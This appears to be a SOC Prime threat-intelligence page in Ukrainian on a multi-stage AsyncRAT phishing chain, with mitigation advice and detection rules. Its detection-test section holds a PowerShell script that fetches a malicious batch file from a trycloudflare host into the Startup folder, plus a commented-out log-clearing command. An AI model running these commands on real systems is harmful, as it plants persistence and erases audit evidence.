SOC Prime Bias: Критичний

14 Січ 2026 18:04
newspaper icon Trend Micro

Як MDR виявила багаторівневий ланцюг атаки AsyncRAT

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Стежити
Як MDR виявила багаторівневий ланцюг атаки AsyncRAT
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Резюме

Звіт описує багаторівневий ланцюг вторгнення, розпочатий через фішингові електронні листи, які доставляють ZIP-приманки з подвійним розширенням і переходять у послідовність завантаження, розміщену на WebDAV. Оператори зловживають інфраструктурою безкоштовного рівня Cloudflare і вбудованими компонентами Python для розгортання AsyncRAT на кінцевих точках жертв. Виконання і стійкість покладаються на власні інструменти Windows — Windows Script Host, PowerShell і пакетні сценарії — тоді як на фінальному етапі використовується впорскування коду в explorer.exe. Маршрутизуючи доставку та підготовку через загальноприйняті хмарні сервіси, активність зливається із нормальним трафіком і може уникнути звичайних периметрових засобів контролю.

Розслідування

Дослідники з Trend Micro повідомили про телеметрію, яка відповідає поетапному процесу доставки: отримання .pdf.zip архіву з Dropbox, виконання вбудованих .url ярликів і подальша взаємодія з WebDAV, якій приписується svchost.exe і rundll32.exe. Ланцюжок потім розгорнув вбудовані файли Python 3.14.0, які використовувалися для запуску спеціального сценарію Python, відповідального за ін’єкцію APC з шеловим кодом AsyncRAT. Стійкість була досягнута шляхом розміщення пакетних файлів у каталозі автозапуску користувача. Аналітики також ідентифікували та зіставили декілька хостів TryCloudflare, що підтримують інфраструктуру.

Пом’якшення

Зменште вплив, навчаючи користувачів сприймати архіви з подвійним розширенням і неочікувані ZIP-вкладення як підозрілі та посилюючи фільтрацію для фішингово-доставлених хмарних посилань. Блокуйте або суворо контролюйте доступ до несанкціонованих хмарних тунельних сервісів та контролюйте ненормальну залежність від WebDAV в середовищах, де це рідкість. Обмежте виконання сценаріїв з каталогів, доступних для запису користувачу, і посиліть контролі навколо використання папки автозапуску і створення запланованих завдань. Пріоритизуйте виявлення EDR/поведінкового аналізу, які можуть виявити ланцюжки виконання, що управляються сценаріями, та техніки впорскування коду, що націлені на нешкідливі процеси.

Реакція

Якщо виявлено активність, ізолювати кінцеву точку та зупинити підозрілі процеси, пов’язані з ланцюгом (особливо svchost.exe, rundll32.exe та python.exe, коли вони пов’язані з інцидентом). Видаліть стійкість, видаливши шкідливі пакетні артефакти з каталогу автозапуску, ліквідуйте завантажені архіви Python та будь-які компоненти AsyncRAT, та проведіть повне судово-медичне обстеження на додаткові підготовчі файли та переміщення по мережі. Оновіть мережеві контроли та списки блокувань, включаючи виявлені домени TryCloudflare та будь-яку пов’язану інфраструктуру, виявлену під час триажу.

“graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef file fill:#ccffcc classDef malware fill:#ff9999 classDef process fill:#ccccff %% Nodes attack_phishing[“<b>Дія</b> – <b>T1566.001 Spearphishing Attachment</b>: Жертва отримує фішинговий електронний лист з вкладенням з подвійним розширенням .pdf.url, яке веде до архіву Dropbox.”] class attack_phishing action file_shortcut[“<b>Файл</b> – <b>.url ярлик</b>: Маскується під PDF-рахунок і вказує на шкідливий архів Dropbox.”] class file_shortcut file action_user_exec[“<b>Дія</b> – <b>T1204.002 Виконання користувачем</b>: Користувач відкриває ярлик, що запускає початкове завантаження.”] class action_user_exec action file_archive[“<b>Файл</b> – <b>Архів Dropbox</b>: Виглядає як PDF-рахунок, містить наступні етапи пейлоадів.”] class file_archive file action_masquerade[“<b>Дія</b> – <b>T1036.008 Маскування</b>: Архів та ярлик імітують справжні PDF-файли, щоб уникнути підозр.”] class action_masquerade action tool_wsh[“<b>Інструмент</b> – <b>Windows Script Host</b>: .wsh/.wsf файли, які виконуються для отримання подальших сценаріїв.”] class tool_wsh tool action_script_proxy[“<b>Дія</b> – <b>T1216 Виконання сценарію системи-влада як проксі</b>: Виконує WSH файли як проксі для завантаження сценаріїв.”] class action_script_proxy action tool_rundll32[“<b>Інструмент</b> – <b>rundll32.exe</b>: Викликає davclnt.dll (DavSetCookie) для спілкування з WebDAV сервером.”] class tool_rundll32 tool action_rundll32[“<b>Дія</b> – <b>T1218.011 Rundll32</b>: Використовує rundll32 для зв’язку з Cloudflare-хостованим WebDAV сервером.”] class action_rundll32 action tool_powershell[“<b>Інструмент</b> – <b>PowerShell</b>: Завантажує Python 3.14 embed zip, витягує його та отримує додаткові bat-файли.”] class tool_powershell tool action_powershell[“<b>Дія</b> – <b>T1059.001 PowerShell</b>: Виконує команди PowerShell для завантаження та витягання.”] class action_powershell action action_hide[“<b>Дія</b> – <b>T1564.001 Приховування артефактів</b>: Зберігає пейлоади в прихованих файлах у каталозі %TEMP%.”] class action_hide action file_hidden[“<b>Файл</b> – <b>Приховані файли в %TEMP%</b>: ne.py, new.bin, a.txt розміщені в %TEMP% і позначені як приховані.”] class file_hidden file action_persistence[“<b>Дія</b> – <b>T1037.001 Сценарій логону</b>: Розміщує bat-файли в папці «Автозавантаження» для постійності.”] class action_persistence action file_startup[“<b>Файл</b> – <b>Файли autostart</b>: ahke.bat і olsm.bat розташовані в «Автозавантаженні» користувача.”] class file_startup file action_ingress[“<b>Дія</b> – <b>T1105 Трансфер інструментів через проникнення</b>: Переносить додаткові шкідливі компоненти з WebDAV сервера.”] class action_ingress action action_cloudapi[“<b>Дія</b> – <b>T1059.009 Хмарне API</b>: Відправляє HTTP/HTTPS запити на домени trycloudflare.com для отримання фінальних пейлоадів.”] class action_cloudapi action action_injection[“<b>Дія</b> – <b>T1055.004 Впровадження в процес</b>: Python сценарій ne.py вприскує оболонку AsyncRAT в explorer.exe через APC ін’єкцію.”] class action_injection action process_explorer[“<b>Процес</b> – <b>explorer.exe</b>: Цільовий процес для ін’єкції shellcode APC.”] class process_explorer process malware_asyncrat[“<b>Шкідливе ПО</b> – <b>AsyncRAT</b>: Введений shellcode встановлює інструмент віддаленого доступу.”] class malware_asyncrat malware action_c2[“<b>Дія</b> – <b>T1102.002 Веб-служба</b>: AsyncRAT комунікує двосторонньо через HTTPS з інфраструктурою Cloudflare.”] class action_c2 action %% Connections attack_phishing u002du002d>|поставляє| file_shortcut file_shortcut u002du002d>|відкритий жертвою запускає| action_user_exec action_user_exec u002du002d>|завантажує| file_archive file_archive u002du002d>|застосовується в| action_masquerade action_masquerade u002du002d>|дозволяє виконання| tool_wsh tool_wsh u002du002d>|виконується як частина| action_script_proxy action_script_proxy u002du002d>|викликає| tool_rundll32 tool_rundll32 u002du002d>|викликає| action_rundll32 action_rundll32 u002du002d>|готує середовище для| tool_powershell tool_powershell u002du002d>|виконує| action_powershell action_powershell u002du002d>|зберігає файли в| action_hide action_hide u002du002d>|створює| file_hidden file_hidden u002du002d>|використовується| action_persistence action_persistence u002du002d>|розміщує| file_startup file_startup u002du002d>|запускає| action_ingress action_ingress u002du002d>|отримує більше компонентів через| action_cloudapi action_cloudapi u002du002d>|поставляє пейлоад до| action_injection action_injection u002du002d>|впроваджує в| process_explorer process_explorer u002du002d>|хостить| malware_asyncrat malware_asyncrat u002du002d>|комунікує через| action_c2 “

Потік атаки

Виявлення

Завантаження або завантаження через Powershell (через командний рядок)

Команда SOC Prime
13 січня 2026

Перегляд

LOLBAS WScript / CScript (через створення процесів)

Команда SOC Prime
13 січня 2026

Перегляд

Файл Python створено в незвичній директорії (через подію файлу)

Команда SOC Prime
13 січня 2026

Перегляд

Підозріле спілкування з доменом Trycloudflare (через проксі)

Команда SOC Prime
13 січня 2026

Перегляд

Можлива операція ручного або сценарійного виконання була здійснена в незвичних папках (через командний рядок)

Команда SOC Prime
13 січня 2026

Перегляд

Підозріле спілкування з доменом Trycloudflare (через DNS)

Команда SOC Prime
13 січня 2026

Перегляд

IOCs (DestinationIP) для виявлення: Аналіз багаторівневої кампанії AsyncRAT через кероване виявлення та реагування

SOC Prime AI правила
13 січня 2026

Перегляд

IOCs (SourceIP) для виявлення: Аналіз багаторівневої кампанії AsyncRAT через кероване виявлення та реагування

SOC Prime AI правила
13 січня 2026

Перегляд

Команда PowerShell для завантаження Python та пакетних файлів для налаштування середовища та стійкості [Windows Powershell]

SOC Prime AI правила
13 січня 2026

Перегляд

Фішингова кампанія з використанням Edge та Cmd для виконання сценарію Python для впорскування коду [Windows Створення процесів]

SOC Prime AI правила
13 січня 2026

Перегляд

Виконання симуляції

Передумова: Телеметрія та передполітна перевірка базового показника повинні були бути пройдені.

  • Оповідь атаки та команди

    Противник, який отримав початковий доступ до PowerShell на скомпрометованому хості Windows, хоче налаштувати середовище виконання Python і досягти стійкості. Вони:

    1. Завантажити вбудований дистрибутив Python безпосередньо на локальну Temp директорію користувача, використовуючи Invoke‑WebRequest.
    2. Завантажити шкідливий пакетний сценарій (ahke.bat) з домену, що проксійований Cloudflare, у папку автозапуску користувача, щоб він виконувався під час кожного входу в систему.
    3. Виконати завантажений zip-архів Python (опущено тут для стислості), щоб виконати подальші навантаження.

    Ці кроки генерують точні командні рядки, що співпадають з правилом Sigma, створюючи журнали блоків сценарію PowerShell з iwr … -OutFile … шаблоном.

  • Сценарій регресійного тестування

    # -------------------------------------------------
# Імітація налаштування середовища AsyncRAT за допомогою PowerShell
# -------------------------------------------------

# 1. Завантаження вбудованого zip-файлу Python у папку temp користувача
$pythonUrl = 'https://www.python.org/ftp/python/3.14.0/python-3.14.0-embed-amd64.zip'
$pythonDest = "$env:USERPROFILEAppDataLocalTempp.zip"
iwr $pythonUrl -OutFile $pythonDest

# 2. Завантаження шкідливого пакетного файлу в Автозапуск для стійкості
$batUrl = 'https://plus-condos-thy-redeem.trycloudflare.com/ahke.bat'
$batDest = "$env:APPDATAMicrosoftWindowsStart MenuProgramsStartupahke.bat"
iwr $batUrl -OutFile $batDest

# 3. (Необов'язково) Запуск виконання пакету для демонстрації стійкості
# Start-Process -FilePath $batDest -WindowStyle Hidden
# -------------------------------------------------

  • Команди очищення

    # Видаліть завантажені артефакти
Remove-Item -Path "$env:USERPROFILEAppDataLocalTempp.zip" -ErrorAction SilentlyContinue
Remove-Item -Path "$env:APPDATAMicrosoftWindowsStart MenuProgramsStartupahke.bat" -ErrorAction SilentlyContinue

# За потреби очистіть журнали блоків сценаріїв PowerShell (потребує прав адміністратора)
# Clear-EventLog -LogName "Microsoft-Windows-PowerShell/Operational"

Приєднуйтесь до платформи Detection as Code від SOC Prime щоб покращити видимість загроз, найбільш актуальних для вашого бізнесу. Щоб допомогти вам почати і забезпечити негайну користь, заплануйте зустріч з експертами SOC Prime.

Приєднатися безкоштовно